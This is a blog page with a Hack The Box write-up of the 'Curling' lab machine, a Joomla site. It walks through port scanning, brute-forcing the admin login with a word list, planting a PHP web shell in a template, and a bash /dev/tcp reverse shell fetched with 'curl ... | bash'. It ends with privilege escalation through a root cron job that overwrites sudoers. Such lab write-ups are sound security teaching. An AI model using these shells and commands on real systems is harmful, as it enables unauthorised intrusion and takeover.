<!DOCTYPE html>
<html lang="en">

<head>
    
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<meta name="HandheldFriendly" content="True" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta name="generator" content="Hugo 0.87.0" />





<title>HTB - Curling - Jonathan Saenz Blog</title>


<meta name="author" content="Jonathan Saenz" />


<meta name="description" content="Jonathan Saenz Blog" />


<meta name="keywords" content="Writeups" />

<meta property="og:title" content="HTB - Curling" />
<meta property="og:description" content="Curling Nmap First, we run a full port scan on the target.
&gt; nmap -p- -T5 10.129.139.144  Then we run a targeted scan with default scripts and version detection enabled." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://blog.jonathanfsaenz.com/post/curling/" /><meta property="og:image" content="https://blog.jonathanfsaenz.com/img/og.png"/><meta property="article:section" content="post" />
<meta property="article:published_time" content="2021-04-22T00:00:00+00:00" />
<meta property="article:modified_time" content="2021-04-22T00:00:00+00:00" />


<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://blog.jonathanfsaenz.com/img/og.png"/>

<meta name="twitter:title" content="HTB - Curling"/>
<meta name="twitter:description" content="Curling Nmap First, we run a full port scan on the target.
&gt; nmap -p- -T5 10.129.139.144  Then we run a targeted scan with default scripts and version detection enabled."/>



<style>
    @media (prefers-color-scheme: dark) {
        body[data-theme='auto'] img {
            filter: brightness(60%);
        }
    }

    body[data-theme='dark'] img {
        filter: brightness(60%);
    }
</style>



<link rel="stylesheet" href="https://blog.jonathanfsaenz.com/assets/css/fuji.min.css" />





</head>

<body data-theme="auto">
    <script data-cfasync="false">
  
  var fujiThemeData = localStorage.getItem('fuji_data-theme');
  
  if (!fujiThemeData) {
    localStorage.setItem('fuji_data-theme', 'auto');
  } else {
    
    if (fujiThemeData !== 'auto') {
      document.body.setAttribute('data-theme', fujiThemeData === 'dark' ? 'dark' : 'light');
    }
  }
</script>

    <header>
    <div class="container-lg clearfix">
        <div class="col-12 header">
            <a class="title-main" href="https://blog.jonathanfsaenz.com/">Jonathan Saenz Blog</a>
            
            <span class="title-sub">Blog about technology, my personal growth, and interests</span>
            
        </div>
    </div>
</header>

    <main>
        <div class="container-lg clearfix">
            
            <div class="col-12 col-md-9 float-left content">
                
<article>
    
    <h2 class="post-item post-title">
        <a href="https://blog.jonathanfsaenz.com/post/curling/">HTB - Curling</a>
    </h2>
    <div class="post-item post-meta">
        <span><i class="iconfont icon-today-sharp"></i>&nbsp;04-22-2021</span>



<span><i class="iconfont icon-pricetags-sharp"></i>&nbsp;<a href="/tags/writeups">Writeups</a>&nbsp;</span>
    </div>
    
    
    <div class="post-content markdown-body">
        <h1 id="curling">Curling</h1>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled.png" />
</p>
<h2 id="nmap">Nmap</h2>
<p>First, we run a full port scan on the target.</p>
<pre><code class="language-bash">&gt; nmap -p- -T5 10.129.139.144
</code></pre>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%201.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%201.png" />
</p>
<p>Then we run a targeted scan with default scripts and version detection enabled.</p>
<pre><code class="language-bash">&gt; sudo nmap -p 22,80 -sV -sC 10.129.139.144
</code></pre>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%202.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%202.png" />
</p>
<h2 id="http-enumeration">HTTP Enumeration</h2>
<p>When we visit the home page, we are presented with what looks like a blog and a login form. The posts was written by Super User.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%203.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%203.png" />
</p>
<p>We are able to find an interesting comment at the end of the home page source code which contains a string that can be base64 decoded.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%204.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%204.png" />
</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%205.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%205.png" />
</p>
<p><strong>secret.txt:</strong> Q3VybGluZzIwMTgh</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%206.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%206.png" />
</p>
<p><strong>secret.txt base64 decoded:</strong> Curling2018!</p>
<p>We are able to find the web application is running Joomla Version 3.8.8 but there isn&rsquo;t any interesting information in the files or sub-directories or know exploits.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%207.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%207.png" />
</p>
<p>We can find the administrator section of the application and start a dictionary attack on the login page.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%208.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%208.png" />
</p>
<p>Let collect a word list from the homepage using cewl tool. The below command generates a word list from the homepage with a minimum work length of 4.</p>
<pre><code class="language-bash">&gt; cewl -m 4 -w cewl.txt http://10.129.139.42
</code></pre>
<p>We can use Burp Suite to intercept a request when trying to log in and then send it to intruder feature. We cleared the payload markers and only set a payload marker on the username. We are using the decoded secret string we found as the password.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%209.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%209.png" />
</p>
<p>After checking the payload time to runtime and uploading cewl.txt file, we started the attack and found then the status code and length of the requested change which could indicate a successful login attempt.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2010.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2010.png" />
</p>
<p>We check the username Floris and password Curling2018! and we got a successful login
We could have used wfuzz instead which could have run a lot faster</p>
<pre><code class="language-bash">&gt; wfuzz -w ~/Desktop/HTB/machines/easy/curling/cewl.txt -d 'username=FUZZ&amp;passwd=Curling2018!&amp;option=com_login&amp;task=login&amp;return=aW5kZXgucGhw&amp;5ebe0ed6685a39cd102c025ff9255ccb=1' -b 'c0548020854924e0aecd05ed9f5b672b=m0l3vrvsoof9qdq2s1vnhqaurd; 99fb082d992a92668ce87e5540bd20fa=trbkddnniboqhtp6ph964qgpot' http://10.129.139.144/administrator/index.php
</code></pre>
<p>We see that there is a templates section in the admin panel and we can there is a templates section. Since we are able to modify the template files, this application is vulnerable to remote code execution and we can execute system commands by adding a PHP web shell script.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2011.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2011.png" />
</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2012.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2012.png" />
</p>
<p>We added a simple web shell to the index.php page what allows us to execute system commands.</p>
<pre><code class="language-php">&lt;?php echo shell_exec($_GET['cmd']); ?&gt;
</code></pre>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2013.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2013.png" />
</p>
<p>We can now create a reverse shell to get remote access with www-data permissions.</p>
<p>reverse-shell.sh:</p>
<pre><code class="language-bash">bash -i &gt;&amp; /dev/tcp/10.10.17.103/8080 0&gt;&amp;1
</code></pre>
<p>After running the following URL with python http.server to request the reverse shell file, we get a reverse shell.</p>
<pre><code class="language-bash">http://10.129.139.144/?cmd=curl 10.10.17.103:8000/reverse-shell.sh | bash
</code></pre>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2014.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2014.png" />
</p>
<h2 id="privilege-escalation">Privilege Escalation</h2>
<p>After unsuccessfully logging into user floris with the decode secrets text, we can find a password_backup file that contains a hex dump.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2015.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2015.png" />
</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2016.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2016.png" />
</p>
<p>We can find how to revert this hex dump, check the file type, and run a series of decompressions and and archiving a file.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2017.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2017.png" />
</p>
<p><strong>password.txt:</strong> 5d&lt;wdCbdZu)|hChXll</p>
<p>We can successful login to floris user with the contents in password.txt.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2018.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2018.png" />
</p>
<h3 id="finding-pe-attack-vector">Finding PE Attack Vector</h3>
<p>After switching to the floris account, we are able to login and find two files owned by root and that get updated every so often.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2019.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2019.png" />
</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2020.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2020.png" />
</p>
<p>We can check the root cron jobs by changes the URL parameter to read the &ldquo;var/spool/cron/crontabs/root&rdquo; and reading the report file after the file updates and see there is in fact two cron jobs running under the root user.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2021.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2021.png" />
</p>
<p>We will replace the sudoers file to allow add floris user to run all commands with no password required. First, we have to create a sudoers file in attacking machine.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2022.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2022.png" />
</p>
<p>We need to modify the input file to make a request for the sudoers file from the attacker&rsquo;s machine.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2023.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2023.png" />
</p>
<p>After the sudoers file is transferred from the attacker&rsquo;s machine, we can log in as root.</p>
<p><img class="img-zoomable" src="/writeups/Curling/Untitled%2024.png" alt="Curling%202f66d0715e0147f9914692bfa76de417/Untitled%2024.png" />
</p>

    </div>
</article>




            </div>
            <aside class="col-12 col-md-3 float-left sidebar">
    
    <div class="sidebar-item sidebar-pages">
        <h3>Pages</h3>
        <ul>
            
            <li>
                <a href="/">Home</a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-links">
        <h3>Links</h3>
        <ul>
            
            <li>
                <a href="https://www.linkedin.com/in/jsaenz1/" target="_blank"><span>LinkedIn</span></a>
            </li>
            
            <li>
                <a href="https://github.com/saenzjonathan11/" target="_blank"><span>GitHub</span></a>
            </li>
            
            <li>
                <a href="https://jonathanfsaenz.com/" target="_blank"><span>Personal Site</span></a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-tags">
        <h3>Tags</h3>
        <div>
            
            <span>
                <a href="/tags/certifications/">Certifications</a>
            </span>
            
            <span>
                <a href="/tags/linux/">Linux</a>
            </span>
            
            <span>
                <a href="/tags/writeups/">Writeups</a>
            </span>
            
        </div>
    </div>
    
</aside>
        </div>
        <div class="btn">
    <div class="btn-menu" id="btn-menu">
        <i class="iconfont icon-grid-sharp"></i>
    </div>
    <div class="btn-toggle-mode">
        <i class="iconfont icon-contrast-sharp"></i>
    </div>
    <div class="btn-scroll-top">
        <i class="iconfont icon-chevron-up-circle-sharp"></i>
    </div>
</div>
<aside class="sidebar-mobile" style="display: none;">
  <div class="sidebar-wrapper">
    
    <div class="sidebar-item sidebar-pages">
        <h3>Pages</h3>
        <ul>
            
            <li>
                <a href="/">Home</a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-links">
        <h3>Links</h3>
        <ul>
            
            <li>
                <a href="https://www.linkedin.com/in/jsaenz1/" target="_blank"><span>LinkedIn</span></a>
            </li>
            
            <li>
                <a href="https://github.com/saenzjonathan11/" target="_blank"><span>GitHub</span></a>
            </li>
            
            <li>
                <a href="https://jonathanfsaenz.com/" target="_blank"><span>Personal Site</span></a>
            </li>
            
        </ul>
    </div>
    
    <div class="sidebar-item sidebar-tags">
        <h3>Tags</h3>
        <div>
            
            <span>
                <a href="/tags/certifications/">Certifications</a>
            </span>
            
            <span>
                <a href="/tags/linux/">Linux</a>
            </span>
            
            <span>
                <a href="/tags/writeups/">Writeups</a>
            </span>
            
        </div>
    </div>
    
    
    
    
  </div>
</aside>
    </main>

    <footer>
    <div class="container-lg clearfix">
        <div class="col-12 footer">
            
            <span>&copy; 2021
                <a href="https://blog.jonathanfsaenz.com/">Jonathan Saenz</a>
                
                | Powered by <a href="https://github.com/amzrk2/hugo-theme-fuji/"
                   target="_blank">Fuji-v2</a> &amp; <a href="https://gohugo.io/"
                                                    target="_blank">Hugo</a> 
            </span>
        </div>
    </div>
</footer>

    
<script defer src="https://cdn.jsdelivr.net/combine/npm/medium-zoom@1.0.6,npm/lazysizes@5.2.2"></script>
<script defer src="https://cdn.jsdelivr.net/npm/prismjs@1.21.0/components/prism-core.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/prismjs@1.21.0/plugins/autoloader/prism-autoloader.min.js"></script>



<script defer src="/assets/js/fuji.min.js"></script>


</body>

</html>